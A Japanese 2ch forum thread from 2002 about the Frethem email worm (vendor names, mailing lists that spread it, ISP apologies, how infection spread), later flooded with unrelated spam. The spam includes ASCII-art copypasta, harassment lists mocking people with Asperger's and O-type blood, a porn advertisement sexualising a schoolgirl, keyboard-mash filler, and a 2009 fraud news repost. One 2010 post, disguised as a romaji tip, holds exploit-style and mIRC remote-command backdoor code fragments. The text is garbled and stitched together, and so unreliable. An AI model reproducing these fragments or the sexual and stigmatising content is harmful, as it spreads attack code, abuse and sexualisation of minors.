一発目のbiglobeメアドに覚えがないんだがなあ

来ないにょ〜

http://uptime.netcraft.com/up/graph?site=hippo.metal.reedrex.co.jp&submit=Examine
OS, Web Server and Hosting History for hippo.metal.reedrex.co.jp
OS Server Last changed IP address Netblock Owner
FreeBSD Apache/1.2.4 1-May-2002 210.255.185.196 REED REX Corporation
FreeBSD Apache/1.2.4 13-Mar-2001 210.255.185.195 REED REX Corporation

あぱっち古い？

ttp://www.turbolinux.co.jp/information/support020717.html

TURBOLINUXがお詫び文出してる。

http://nws.tns-tanabe.co.jp/nc/
で配信されたよー。
怖い怖い。

>>141
禿しく月危いﾖｶﾝ

なんで苦情を送り返してくる人（ソフトウェア関係の会社の人ばっかり）はなんであんなに高圧的なんだろう。

感染して送り出してしまったこっちは何も言えないけど。

なんでがかぶた

>>145
だったら何も言うな

frethemってなんてよむの？

>>148
>>19

>147
お前も言うな

○○○○@mail.doshisha.ac.jpという見ず知らずのヤシからWORM_FRETHEM.Kが
送られてきた。
これって同志社大学のアドレス？

>>151 送信者詐称

え? これKlezみたいに送信者詐称するの?
しないと思ってたけど。

compath-mlの発信元から詫び状がきたよ
たぶんこのスレの何人かにも来てるはず。
ML経由でウィルスばら撒いた（しかも休止中のML)ってのが
よほど応えたんだろうね

turbolinuxは詫び状出したんだろうか？

不特定多数が参加するＭＬは、text/plain なメールしか
受け付けないように設定しておく。ウィルスも排除できるし、
Outlook Express のタコなHTMLメールも排除できてｳﾏｰ

まだ来ないよ〜！！いや、来なくていいが。。。
Virus付きメールよりも、南アフリカの某大学から来る学歴書付きメールの方がウザイ。
何もしなくても、個人情報集まってくる(--;

そういえば、以前にfree-ml.comのMLでもKlezが流れたことがあった。
意図的に流したのかもしれないけど、ワビとかはなかったな。
ただ「注意してください」程度のものだった。

各ベンダでの呼び名一覧
W32.Frethem.K@mm [Symantec]
I-Worm.Frethem.l [AVP]
W32/Frethem.l@MM [McAfee]
WORM_FRETHEM.K [Trend]
W32/Frethem-Fam [Sophos]

ごめん、158はIとKがまじっちゃってた

なんか新しいの出てない〜?

あっという間に蔓延したが、１日でほぼ収束しちゃったね

メール文の最後に発信元の名前を書き付けるから
会社名とか入れてると最悪だ

ﾖｶﾝ外れちゃったね。
今回は絶対大流行するとふんで、ふだんは流さないｳｨﾙｽ注意報を
管理してるMLに流しちゃったのに…
もちろんMLはHTMLﾊﾈてるけど、ﾒｰﾙ初心者ばかりのMLで、
誰かが感染するたびに大騒ぎになるから…

メーリング・リスト管理者はウイルス「Frethem」の配布を防げ
http://itpro.nikkeibp.co.jp/free/NOS/NEWS/20020718/2/

　インターネット接続サービス会社「豊島ケーブルネットワーク」（本社・東京都豊島区）が、
コンピューターウイルスが入った電子メールを誤って同社の顧客約１万１０００人に一斉送信
していたことがわかった。
　メールの誤送信があったのは１５日午前８時半ごろ。サービス情報などの提供を受けるため
に登録した顧客あてに一斉送信した。同社には１８日夕までに約１００件の苦情や問い合わせ
が寄せられ、同社は全員におわびのメールを送った。
　このウイルスは、感染したパソコンのアドレス帳に記載された人全員にウイルス入りメール
を送りつける。経済産業省の外郭団体「情報処理振興事業協会」セキュリティセンターは「接
続サービス会社が感染メールを一斉送信した例は聞いたことがない」としている。
http://www.yomiuri.co.jp/04/20020719ic05.htm

やっぱ「IEのキャッシュからメールアドレスを抽出する」機能が
ないと、間接的にもつながりのない不特定多数の人に送って
しまうという事がないのが弱いかな。
自分の場合、badtransやklezのときはWEBページで公開して
いるアドレス宛にたくさん来たけど、frethemは未だ一通も来てない。

これってほんとの所、どういう経路で来てるの。さっぱり分からん。

うちもMLで来たのもあるけど、そのサーバーマシンが感染したの？
あちことでMLから送られてきたって記事になってるじゃん。
Nimdaのように、サーバーが感染したわけ？

>>168

>166>サービス情報などの提供
登録アドレス管理してるヤシのパソコンが感染したと禿しく思われ。

>>169
>166>サービス情報などの提供

サンクス。ちょっと考えてみた。

ってことは、今回の場合、そのMLが添付ファイルを撥ねない設定になって
いる場合、送信権限のあるやつのパソコンが感染し、MLへの投稿のような
形でメールを送り、MLに登録してあるすべてのアドレスへ送信。
さらに送信者のところ（from）も、ML登録者の中から選んで偽った、
という感じなの？

なんというか、送信先を、「localhost.XX.JP」とかMLで使われるのを優先
して拾って送信するようにしてあるみたいだね。ランダムに送るのだと、
こんなにMLにばかり被害はなかったんじゃないのかな。

一般人が参加するMLだと添付ファイル禁止のとことが多いけど、サービス
情報提供用とかだと、添付当然だよね。考えてみたらオレもそんなやつ
いっぱい受信してるよ。送信できないけどね。

感染したパソコンの数は大した事なかったのに、飛び交ったウイルスメール
の数は凄まじく膨大だった、ということかな？

今、Frethemが届きました。ノートンさんがはじいてくれたので助かりました。
でも、相手は記憶にない人です。
これは、ウィルスメールを配信してますよと教えた方がいいのでしょうか？

>>171
よっぽど親しい知り合いじゃない限りほっとく。
どうせあちこちから連絡がきて、いまごろ大忙しだ。

>>169 >>170
本当の原因は豊島ケーブルネットワークが会員である私の問い合わせに
「通信の秘密にかかわることなので、お答えできない」ことと、「社内の
PCが感染したということはない」、「アドレスが漏洩した事実はない」と
電話で回答している。（アテにはならんが）

しかし、送信先に使われた同報アドレスは、[email protected] で、
このアドレスは1999年から2000年にかけて、案内メール送信先アドレスとして
使用した実績がある。これが原因のはず。

アドレスは http://www.toshima.ne.jp/Frethem.html に記載されているので、
公開情報となった。ただしこのページには「特に発信アドレスが alluser@t.
toshima.ne.jp を偽って発信されているメールがあります」と書いてあるが、
「踏み台にされているという意味で（豊島ケーブル談）」あって、alluserが
メールのfromになっているわけではなく、toになっている。fromは「FRETHEM
はfromを詐称しない（IPA談）」のであるから、感染者であると思われる。

ZDNetに詳細記事が出ています。原因についての憶測も読売の記事よりは正しいと思う。
http://www.zdnet.co.jp/news/0207/19/njbt_09.html

1です。流行るとおもったんだけどなぁー。
スレ番100以下まで落ちたのでラストカキコsage。

はやったのは最初だけか・・・
つまらんな

>>176
アンチウイルスソフトで対応できなかった（ひねりも無い）最新版が、だた広まっただけだから。

HTMLメール対応メーラ使ったこと無いから知らんのですけど
プレビューしただけで感染するってのは前からあったんですか？

俺ウイルスバスター2002使ってて、「Re: Your Password!」を受信すると
「HTML_IFRMEXP.GEN」を検出したと表示されるけど、実は「WORM_FRETHEM.K」だったんだな。

考えてみると「HTML_IFRMEXP.GEN」の検出って
IEのセキュリティホールに起因するダイレクトアクション機能をブッ殺すんだな。
いつの間にバスターにダイレクトアクションをブッ殺すパターンが加わったんだ…。

>>178
元祖はバブルボーイ。だが、バブルボーイは日本語Windowsでは発病できなかった。
ちょうど1年前くらいにはやったNimda、Badtransあたりがプレビュー感染のメジャーになった。

ありがとうございます。そうだったんですか、よくわかりました。

ウイルスより
ぜんぜん知らない野郎のアドレス帳に自分のアドレスがあることが鬱だ。

株式会社リード・レックス

ってまったく知らないのにウイルスとお詫びをいただいてコワヒ

ニュース速報＋のスレ

流行しなかったんだよなぁ結局

（＾＾）

（＾＾）

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

　　　 　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾ ） ＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉

◎人の嫌がることをズケッと言うのはこんな奴！
＜アスペルガー症候群（自閉症スペクトラム）←脳の機能的疾患（遺伝が要因）＞
●変化を嫌う
http://web.kyoto-inet.or.jp/org/atoz3/kado/book1/Williams-Asp.htm

●接し方のルールがわからず無邪気に周囲の人に対して迷惑なことをしてしまうことがある。人を傷つけるということには鈍感（相手の立場に立って考えられない）。
●パターン的行動、生真面目すぎて融通が利かない
　毎朝の通学電車では同じホームの同じ場所から、同じ時間の同じ号車に乗ることに決めていたりする。パターンを好むということは反復を厭わないことでもある。
●アスペルガー症候群の子どもは（大人も）感覚刺激に対して敏感。敏感さは聴覚、視覚、味覚、嗅覚、温痛覚などのいずれの感覚の敏感さもありえる（特に視覚が敏感）。
●アスペルガー症候群の子ども（大人も）は予測できないことや変化に対して苦痛を感じることが多い。
http://www.autism.jp/l-02-03-aspe3.htm

●独り言を言うことが多い（考えていることを口に出す）
●物事をいつまでも同じにしておこうとする欲求が強く、そうでないと非常に不安。いわゆる「こだわり」。
●自発的に行動することが少なく、興味の幅が狭い
●物まねをしているような不自然な言語表現
●自閉症スペクトラム全体としては一万人に91人（およそ100人に1人）。
http://www.ypdc.net/asuperugar.htm

★自閉症スペクトラムの考え方(アスペルガーに至らない気質の偏りもある（遺伝性））
http://www.imaizumi-web.com/030413.html　　
　　　
★アスペルガー症候群（自閉症スペクトラム）かどうかのテスト
http://twitwi.s10.xrea.com/psy/add.htm　
http://www.geocities.co.jp/Beautycare/5917/as/marksheetmake.html

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

＜血液型O型の一般的な特徴＞（ すべて許していると調子にのってつけこんでくるぞ！！ ）

■優秀な人間を叩いて安心しようとする。多数対少数のときだけめっぽう強気。才能ある人間と対峙できない
■場所が変わると手のひらを返すように態度が豹変する （　あの連中の中じゃヘコヘコさせられてきたが、うちに来たら見ていろ！　礼儀を教えてやるぜ。　）
■カッコイイ人に注目したがるが自分を磨こうとしない。なぜか、カッコイイ人は自分にソックリだと信じ込む
■基本的に怖がり。粘着にからまれるとすぐに全く関係ない人と戦わせようとする （　どうせ>>１さんはヒッキーでしょ？ / あいつだってDQNだからｼﾞｻｸｼﾞｴﾝしてるぜ　）
■早とちりが多く、誤爆と気付いた後でも釈明できない。いい人を装って忘れる （ そういう土地柄だったのさ ）
■毒舌を吐いて場の空気を陰険にする。そのあと自分で耐え切れなくなりご都合主義にあきれる。（ いったいこの国はどうなってるんだ？　間違っている！ ）
■スケールの小さい自画自賛をして小市民的に満足しようとする（　俺んちの車は古いが車も持ってない奴に比べればマシな方だな　）
■すぐにおせっかをやくが、自分のためであるということを見抜かれる。それに気付いて恥ずかしさをごまかすために大袈裟にキレる
■マニアックで虐待的。ケチだけつけて批判される所には出ない。人に観察されているとを知って焦る
■自分が企んでいるのに相手を悪人に仕立て上げ、己の為に餌食にする。攻撃を誘って自分の憎悪に酔いしれる。
■たいしたこともやってないうちに大物ぶる。 （ 顔が見えないインターネットでは自分の才能や苦労を多めに見積もって書き込む ）
■世間に通用しないような事ばかり繰り返して自分に課した目標から逃げる。あげくに人のせいにして相手に伝わらない方法でキレる。
■人生経験未熟なので集団でしか相手を見れない （ 君のような人はウチでは…　 / ○さんによく似てるから…　）

セーラー服の少女と３Ｐ。なんともうらやましい光景です。
オマンコは小ぶりながらもビラビラ大きめで相当使い込んでいる様子！
オッパイの方も手ごろな大きさで揉み応えありそうですよ。
ローターで喘ぎまくっちゃうところなんか感度よすぎ！
セーラー服好きな方はここ！！
無料動画を観てね
http://www.pinkschool.com/

聞いたこともないウイルスでつ。

-

おや？

そうだよ

まじ？

　|:::|::|__　　　　､-'''"´￣￣｀"''''-､ 　 __|_::::||
__|::::|::|_|_　　 ／ ／　　　　　 　＼ ＼|::::||;;;||.. 　___　.___
�m|::|::|::::|＿/　　　● ,,.　　.,, ●　 　 ヽ:||::::::_|__|_ |　|iiii
：：：：||::::|;;;;;|. 　　　　（__人__）　　　　　|目;;‖|≡|￣|iiii
：：：：||::::|旦''-､､,,,,,,__＿＿＿＿,,,,,,､､-'' 超巨大ｼｮﾎﾞｰﾝ

dfhfhh




ururt




ryeeyer





eryerye




dfhfdhdf




eryery

あげ

てす

【社会】ヤフオクで虚偽出品　被害者からの苦情電話が通じない山間部へ逃げるも、「うんざり」して自首　和歌山

1 ：おっおにぎりがほしいんだなφ ★：2009/02/19(木) 07:57:49 ID:???0
かつらぎ署 詐欺容疑自首の男逮捕

インターネットの「ヤフーオークション」で虚偽の出品をして
落札者から金をだまし取ったとして、かつらぎ署は１８日、
住所不定、無職植田達也容疑者（３４）を詐欺容疑で緊急逮捕した。

植田容疑者の携帯電話に、被害者からの問い合わせや苦情が相次ぎ、
「うんざりした」と、同日夕に自首してきたという。

発表によると、植田容疑者は昨年１０月、オークションの掲示板に
「ミスターチルドレンのコンサートチケット２枚を販売する」という虚偽内容の記載をし、
落札した高松市内の女性（３１）に代金名目で２万５７９０円を口座に振り込ませ、
だまし取った疑い。

植田容疑者は「仕事がなくなり、金に困っていた。約２０人から計約８０万円をだまし取った。
相手から、問い合わせや苦情の電話が頻繁にかかってきて、携帯電話が通じない
山間部へと逃げてきた」と供述。
同署で取り調べを受けている最中にも、被害者の女性からの電話がかかってきていたという。


ソース：読売新聞
http://www.yomiuri.co.jp/e-japan/wakayama/news/20090218-OYT8T01020.htm

4 ：ｚ：2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。

ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/

漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか？
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか？

　　∧＿∧
　 （　・∀・）　　　|　|　ｶﾞｯ
　と　　　　）　 　 |　|
　　 Ｙ　/ノ　　　 人
　　　 /　）　 　 < 　>__Λ∩
　 ＿/し'　／／. Ｖ｀Д´）/ ←>>187
　（＿フ彡　　　　　 　　/

207